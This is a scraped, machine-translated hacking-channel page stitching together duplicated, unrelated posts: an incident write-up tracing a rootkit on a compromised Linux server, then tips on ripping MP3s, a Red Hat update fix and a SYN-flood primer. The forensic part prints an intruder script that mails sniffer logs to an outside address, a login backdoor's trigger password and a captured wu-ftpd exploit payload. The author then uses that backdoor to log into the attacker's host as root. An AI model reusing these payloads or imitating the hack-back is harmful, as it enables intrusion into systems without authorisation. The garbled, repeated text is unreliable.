678 1 S 0:00 / sbin / mingetty tty1
679 2 S 0: 00 / sbin / mingetty tty2
680 3 S 0:00 / sbin / mingetty tty3
681 4 S 0:00 / sbin / mingetty tty4
682 5 S 0:00 / sbin / mingetty tty5
683 6 S 0:00 / sbin / mingetty tty6
5557? S 0:00 / bin / sh -i
5591? R 0:00 ps
🦑 I think anyone knows what it means. So let's take a step by step to see what he did
[this hack did not expect that this machine already has an owner, and installed its own rootkit toolkit]
1) [root @ ns] # strings / bin / login | more
..........
__bss_start
_end
PPRV
DISPLAY
/ bin / envpc
l4m3r0x
/ bin / sh
2) From the above, it can be seen that it is a login backdoor, through export PATH = \ After "l4m3r0x \", you can directly telnet each other to get #
[root @ ns] # strings / bin / ls | more
.....
always
/ usr / local / share / locale
fileutils
GNU fileutils-3.13
vdir
% s-% s
/dev/sgk/.fsdc/.1file
// DIRED //
// SUBDIRED //
POSIXLY_CORRECT
COLUMNS
3) Note that /dev/sgk/.fsdc/.1file is where his rootkit file is located, so let's See what's there
[root @ ns] # mv /dev/sgk/.fsdc/.1file / tmp
[root @ ns] # ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undrecode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
XR-X. 1--rwxr undercode 28004 Real-Aug-PS 23 is
-rwxr XR-580 696-X. 1 undercode On Feb 2000 SSH 18 is
-rw-R & lt - r--. 1 the root FTP 1398 System On Feb. 4 08:55
4) Oh It seems that there are quite a lot of things. From ftp, we can know that he is using the ftP vulnerability. From lujiang, he also stole a local user
[root @ ns .fsdc] # cat .1logz
rshd
[root @ ns .fsdc] # cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root @ ns .fsdc] # cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse
5) Logz is called by syslogd, which hides the records generated by the listed commands.
.1proc is called by the ps command. Hides the listed process names
. Listed file names,
[root @ ns .fsdc] # cd patches
[root @ ns patches] # cat patch.sh
#! / Bin / sh
echo \ "[1] Patching WU-FTPd ... \"
rpm -Uhv wuftpd.rpm
echo \ "[2] Patching NFS-utils ... \"
rpm -Fvh nfs-utils.rpm
ps aux >> / tmp / psaux
if [\ "
echo \" [3] Restarting the rpc.statd daemon (NFS-utils) \ "
/etc/rc.d/init.d/nfslock restart
else
echo \ "[4] The daemon rpc.statd isn \ t running, so no need to restart! \"
fi
rm / tmp / psaux
6) This is a patch package for the wuftpd and rpc.statd vulnerabilities. ]
other file directory I did not carefully read [these will provide the download package]
according to the list of hidden files .1file us one find these documents.
[root @ ns .fsdc] # strings / usr / bin / xtty
. .....
PPRV
(nfsiod)
socket
bind
listen
accept
/ bin / sh
🦑Tracking a hack full tutorial by undercode :
t.me/undercodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) I check my machine, the unexpected discovery was hacked
actually my own mistakes, not patched wuftpd26, but also Without changing / etc / ftpusers,
people can easily use wuftpd26's remote vulnerability to enter my machine with anonymous users. However, this friend apparently used the rootkit without consideration
🦑 As a result, the output of ps is as follows:
[root @ ns] # ps
PID TTY STAT TIME COMMAND
678 1 S 0:00 / sbin / mingetty tty1
679 2 S 0: 00 / sbin / mingetty tty2
680 3 S 0:00 / sbin / mingetty tty3
681 4 S 0:00 / sbin / mingetty tty4
682 5 S 0:00 / sbin / mingetty tty5
683 6 S 0:00 / sbin / mingetty tty6
5557? S 0:00 / bin / sh -i
5591? R 0:00 ps
🦑 I think anyone knows what it means. So let's take a step by step to see what he did
[this hack did not expect that this machine already has an owner, and installed its own rootkit toolkit]
1) [root @ ns] # strings / bin / login | more
..........
__bss_start
_end
PPRV
DISPLAY
/ bin / envpc
l4m3r0x
/ bin / sh
2) From the above, it can be seen that it is a login backdoor, through export PATH = \ After "l4m3r0x \", you can directly telnet each other to get #
[root @ ns] # strings / bin / ls | more
.....
always
/ usr / local / share / locale
fileutils
GNU fileutils-3.13
vdir
% s-% s
/dev/sgk/.fsdc/.1file
// DIRED //
// SUBDIRED //
POSIXLY_CORRECT
COLUMNS
3) Note that /dev/sgk/.fsdc/.1file is where his rootkit file is located, so let's See what's there
[root @ ns] # mv /dev/sgk/.fsdc/.1file / tmp
[root @ ns] # ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undrecode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
XR-X. 1--rwxr undercode 28004 Real-Aug-PS 23 is
-rwxr XR-580 696-X. 1 undercode On Feb 2000 SSH 18 is
-rw-R & lt - r--. 1 the root FTP 1398 System On Feb. 4 08:55
4) Oh It seems that there are quite a lot of things. From ftp, we can know that he is using the ftP vulnerability. From lujiang, he also stole a local user
[root @ ns .fsdc] # cat .1logz
rshd
[root @ ns .fsdc] # cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root @ ns .fsdc] # cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse
5) Logz is called by syslogd, which hides the records generated by the listed commands.
.1proc is called by the ps command. Hides the listed process names
. Listed file names,
[root @ ns .fsdc] # cd patches
[root @ ns patches] # cat patch.sh
#! / Bin / sh
echo \ "[1] Patching WU-FTPd ... \"
rpm -Uhv wuftpd.rpm
echo \ "[2] Patching NFS-utils ... \"
rpm -Fvh nfs-utils.rpm
ps aux >> / tmp / psaux
if [\ "
cat / tmp / psaux | grep rpc. statd \ "]; thenecho \" [3] Restarting the rpc.statd daemon (NFS-utils) \ "
/etc/rc.d/init.d/nfslock restart
else
echo \ "[4] The daemon rpc.statd isn \ t running, so no need to restart! \"
fi
rm / tmp / psaux
6) This is a patch package for the wuftpd and rpc.statd vulnerabilities. ]
other file directory I did not carefully read [these will provide the download package]
according to the list of hidden files .1file us one find these documents.
[root @ ns .fsdc] # strings / usr / bin / xtty
. .....
PPRV
(nfsiod)
socket
bind
listen
accept
/ bin / sh
7) It is not difficult to see that it is a backdoor
[root @ ns .fsdc] # strings / dev / pttys
#! / Bin / sh
cat /dev/sgk/.fsdc/ system | mail prosupp@usa.net > / dev / null 2> & 1
nohup / usr / lib / lpset> / dev / null &
nohup / usr / bin / xtty> / dev / null &
rm -rf nohup.out
this The hack is very smart, and you can send sniffing records to this scriptprosupp@usa.net [/dev/sgk/.fsdc/system是个嗅探记录]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=\%.100s\, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new% d bit RSA key.
RSA key generation complete.
F: p: b: k: h: g: diqV:
i686-unknown-linux
1.2.27
sshd version% s [% s]
Usage:% s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine will open a convenient door for
hacking after startup. [Root @ ns .fsdc] # strings / sbin / syslogd
=========== =======================================================
Time:% s Size:% d
Path:% s
=>% s [% d]
------------------------------ ------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/ dev / null
eth0
system
cant open log
🦑 This hack changed the syslogd file into a sniffer
. . . . . . . . . .
The next step is to restore the system and modify the stolen account password. This is not a complaint here. From my sniffing records, I know that he came from these two machines.
[Root @ ns man] # more system2
================ =================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
--------------------------- ---------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================
🦑 From the above we know that the hack was attacked from 210.217.237.75. According to habits, usually the same backdoor is done, so
[root @ ns man] # export DISPLAY = \ "l4m3r0x \"
[root @ ns man] # telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is \^]\.
> Boramae Cache Server 3.5.1
bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 / sbin / mingetty tty5 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
944 6 S 0:00 / sbin / mingetty tty6 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
957 1 S 0:00 -bash HOME = / root PATH = / sbin: / bin: / usr / sbin: / usr / bin SHELL = /
22151? S 0:00 -bash HOME = / root USER = root LOGNAME = root PATH = / usr / bin: / bin:
22178? S 0:00 \\ _ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN = | / usr / bin /
. . . . . . . . . .
[root @ ns .fsdc] # strings / dev / pttys
#! / Bin / sh
cat /dev/sgk/.fsdc/ system | mail prosupp@usa.net > / dev / null 2> & 1
nohup / usr / lib / lpset> / dev / null &
nohup / usr / bin / xtty> / dev / null &
rm -rf nohup.out
this The hack is very smart, and you can send sniffing records to this scriptprosupp@usa.net [/dev/sgk/.fsdc/system是个嗅探记录]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=\%.100s\, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new% d bit RSA key.
RSA key generation complete.
F: p: b: k: h: g: diqV:
i686-unknown-linux
1.2.27
sshd version% s [% s]
Usage:% s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine will open a convenient door for
hacking after startup. [Root @ ns .fsdc] # strings / sbin / syslogd
=========== =======================================================
Time:% s Size:% d
Path:% s
=>% s [% d]
------------------------------ ------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/ dev / null
eth0
system
cant open log
🦑 This hack changed the syslogd file into a sniffer
. . . . . . . . . .
The next step is to restore the system and modify the stolen account password. This is not a complaint here. From my sniffing records, I know that he came from these two machines.
[Root @ ns man] # more system2
================ =================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
--------------------------- ---------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================
🦑 From the above we know that the hack was attacked from 210.217.237.75. According to habits, usually the same backdoor is done, so
[root @ ns man] # export DISPLAY = \ "l4m3r0x \"
[root @ ns man] # telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is \^]\.
> Boramae Cache Server 3.5.1
bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 / sbin / mingetty tty5 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
944 6 S 0:00 / sbin / mingetty tty6 HOME = / TERM = linux BOOT_IMAGE = linux AUTO
957 1 S 0:00 -bash HOME = / root PATH = / sbin: / bin: / usr / sbin: / usr / bin SHELL = /
22151? S 0:00 -bash HOME = / root USER = root LOGNAME = root PATH = / usr / bin: / bin:
22178? S 0:00 \\ _ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN = | / usr / bin /
. . . . . . . . . .
3) Use the rpm command to see if often used commands are modified
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
UNDERCODE COMMUNITY
🦑 TRACKING A HACK FULL BY UNDERCODE
This methode is used by GOV
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Beautify and Finish-Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
> Many friends who like music will try to make MP3s on CDs on their computers, of course, users of Linux You can also make your own MP3s. This is not a Windows / Mac patent. This time I will introduce two Linux programs for making MP3.
My favorite is Grip written in GTK +.
1) Grip is not actually an MP3 encoder or a CD-tracking program. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.
2) As for CD ripper (grabbing CD Track program), Grip supports cdparanoia and cdda2wav. Look at the MP3 encoder again, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, etc., which is quite beneficial! I use cdparanoia and bladeenc.
🦑 The following is the URL of some CD ripper / MP3 encoder:
1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav
2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html
3) You can choose one of the CD ripper and MP3 encoder, and you can use Grip after installation. If you are using rpm, I suggest you use cdparanoia / cdda2wav + gogo. Their RPM can be downloaded from the following URL:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm
4) If you are using Debian / Corel / Storm linux, you can choose to use the two Debian packages cdparanoia / cdda2wav, but because of copyright issues, Debian does not have the MP3 Encoder package, you need to install it yourself.
5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.
6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.
7) Then you can put your beloved Audio CD into the CD-ROM drive, and you can see that the forms in Tracks have been automatically updated. If you have time, you can click the "Pencil" key below to give CDs and Tracks proper names. In the form, we need to press the right mouse button to select the song. After selecting it, select the Rip page and press Rip + Encode. Then the selected Tracks will be made into MP3. Grip can also grab a part of the track, select the Rip partial track, press Play, note the sector at the beginning and end of the part, and enter them in the Start sector and End sector, respectively. When the process is complete, the created MP3s will be in the mp3 directory in the home director, ie ~ / mp3 /.
🦑 KDE Department: Krabber
1) Krabber is another frontend for CD Ripper and MP3 Encoder. Krabber is developed using QT and KDE library, so only KDE users can use it. This is a major disadvantage of Krabber ... (I have not used KDE, and I have to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc, xingmp3enc, but Krabber can automatically detect whether the system has the required elements.
🦑Beautify and Finish-Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
> Many friends who like music will try to make MP3s on CDs on their computers, of course, users of Linux You can also make your own MP3s. This is not a Windows / Mac patent. This time I will introduce two Linux programs for making MP3.
My favorite is Grip written in GTK +.
1) Grip is not actually an MP3 encoder or a CD-tracking program. It just provides a simple and easy-to-use graphical interface so that you don't have to use commands to make MP3s.
2) As for CD ripper (grabbing CD Track program), Grip supports cdparanoia and cdda2wav. Look at the MP3 encoder again, it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode and gogo, etc., which is quite beneficial! I use cdparanoia and bladeenc.
🦑 The following is the URL of some CD ripper / MP3 encoder:
1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav
2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html
3) You can choose one of the CD ripper and MP3 encoder, and you can use Grip after installation. If you are using rpm, I suggest you use cdparanoia / cdda2wav + gogo. Their RPM can be downloaded from the following URL:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386. html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35- 1.i386.rpm
4) If you are using Debian / Corel / Storm linux, you can choose to use the two Debian packages cdparanoia / cdda2wav, but because of copyright issues, Debian does not have the MP3 Encoder package, you need to install it yourself.
5) After you have installed the CD ripper and MP3 Encoder, you can use Grip to make MP3s. Grip's website is: http://www.nostatic.org/grip
You can go to "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm" to download its RPM package, and the Debian package Grip, you can download and install with apt-get.
6) Enter the execution instruction grip, and you can see the main program screen of Grip. First, we need to set up the CD ripper and MP3 encoder used. Click on the Config page, select Rip, and select the installed CD Ripper in Ripper. Then select MP3 from Config and select an installed MP3 encoder in the Encoder field.
7) Then you can put your beloved Audio CD into the CD-ROM drive, and you can see that the forms in Tracks have been automatically updated. If you have time, you can click the "Pencil" key below to give CDs and Tracks proper names. In the form, we need to press the right mouse button to select the song. After selecting it, select the Rip page and press Rip + Encode. Then the selected Tracks will be made into MP3. Grip can also grab a part of the track, select the Rip partial track, press Play, note the sector at the beginning and end of the part, and enter them in the Start sector and End sector, respectively. When the process is complete, the created MP3s will be in the mp3 directory in the home director, ie ~ / mp3 /.
🦑 KDE Department: Krabber
1) Krabber is another frontend for CD Ripper and MP3 Encoder. Krabber is developed using QT and KDE library, so only KDE users can use it. This is a major disadvantage of Krabber ... (I have not used KDE, and I have to install KDE). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc, xingmp3enc, but Krabber can automatically detect whether the system has the required elements.
Twitter
UNDERCODE TESTING (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE TESTING (@UndercodeNews). 𝔸𝕕𝕧𝕒𝕟𝕔𝕖𝕕 & 𝔸𝕝𝕨𝕒𝕪𝕤 𝕌𝕡𝕕𝕒𝕥𝕖𝕕. Lebanon-North
2) It needs mpg123 to play MP3. Krabber's settings are similar to Grip. Format selects the installed MP3 encoder, and the first box in Generic Options selects your input device, such as / dev / hdc (CDROM drive). One feature of Krabber that Grip does not have is to adjust CPU resources so that you can record MP3s while working. Krabber is relatively easy to use, just follow its four steps:
choose a song, choose a directory, file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org The
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
choose a song, choose a directory, file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org The
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) Download the following files in the same directory first
* up2date-3.1.23.2 -1.i386.rpm-MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm-MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm
2) Check MD5 code
[user @ localhost user] $ md5sum 'filename'
3) [user @ localhost user] $ su
Password: (enter root password)
4) [root @ localhost user] # rpm -Fvh up2date- *
5) [root @ localhost user] # up2date -pIf
you refuse to connect on the 5th, it is because rh requires you to reactivate your Account, you can go to https://rhn.redhat.com/renew/ and
enter your username and answer any questions you want to activate your account. The
other versions are the same
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) Download the following files in the same directory first
* up2date-3.1.23.2 -1.i386.rpm-MD5 Checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
* up2date-gnome-3.1.23.2-1.i386.rpm-MD5 Checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0 /NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm
2) Check MD5 code
[user @ localhost user] $ md5sum 'filename'
3) [user @ localhost user] $ su
Password: (enter root password)
4) [root @ localhost user] # rpm -Fvh up2date- *
5) [root @ localhost user] # up2date -pIf
you refuse to connect on the 5th, it is because rh requires you to reactivate your Account, you can go to https://rhn.redhat.com/renew/ and
enter your username and answer any questions you want to activate your account. The
other versions are the same
WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
Denial of service attack (DOS, Denial Of Service) can refer to any operation that makes the service unable to be provided normally. For example, software bugs, operation errors, etc. However, the possibility of dos caused by incorrect operations is very small, and more malicious attacks. Denial of service attacks have now evolved into Distributed Denial of Service (DDOS) attacks, which use more agents to focus on the target, which is more harmful.
> We all know that the TCP / IP protocol has now become the entire Internet framework protocol It can be said that if there is no tcp / ip, at least the internet will not be as popular as it is now, and there will not even be an internet. But everything has two sides, tcp / ip benefits us all, and because of the problem of the protocol itself, Become a tool for others to attack us. We will use the TCP three-way handshake to establish the connection to illustrate.
🦑 First, the TCP syn flood
1) The client sends a tcp packet containing SYN (synchronize) to the server. This packet contains basic information such as the client port and tcp sequence number.
2) After the server receives the SYN packet, it will send a SYN-ACK packet to confirm.
3) After receiving the SYN-ACK packet from the server, the client will send an ACK back to the server. If the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like, heaven and earth ... two churches) ... into the cave ... haha) The
> problem lies in step 3. If the server cannot receive the client's ACK packet, it will wait. This state is called a semi-connected state. It will be kept for a certain period of time (the specific time varies with different operating systems). If the SYN request exceeds the limit that the server can accommodate and the buffer queue is full, the server will no longer accept new requests, and connections from other legitimate users will be rejected . This kind of attack is often half-sin, and it is extremely lethal.
🦑 Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
Denial of service attack (DOS, Denial Of Service) can refer to any operation that makes the service unable to be provided normally. For example, software bugs, operation errors, etc. However, the possibility of dos caused by incorrect operations is very small, and more malicious attacks. Denial of service attacks have now evolved into Distributed Denial of Service (DDOS) attacks, which use more agents to focus on the target, which is more harmful.
> We all know that the TCP / IP protocol has now become the entire Internet framework protocol It can be said that if there is no tcp / ip, at least the internet will not be as popular as it is now, and there will not even be an internet. But everything has two sides, tcp / ip benefits us all, and because of the problem of the protocol itself, Become a tool for others to attack us. We will use the TCP three-way handshake to establish the connection to illustrate.
🦑 First, the TCP syn flood
1) The client sends a tcp packet containing SYN (synchronize) to the server. This packet contains basic information such as the client port and tcp sequence number.
2) After the server receives the SYN packet, it will send a SYN-ACK packet to confirm.
3) After receiving the SYN-ACK packet from the server, the client will send an ACK back to the server. If the server receives this packet, the TCP connection is established and the two parties can communicate (it feels like, heaven and earth ... two churches) ... into the cave ... haha) The
> problem lies in step 3. If the server cannot receive the client's ACK packet, it will wait. This state is called a semi-connected state. It will be kept for a certain period of time (the specific time varies with different operating systems). If the SYN request exceeds the limit that the server can accommodate and the buffer queue is full, the server will no longer accept new requests, and connections from other legitimate users will be rejected . This kind of attack is often half-sin, and it is extremely lethal.
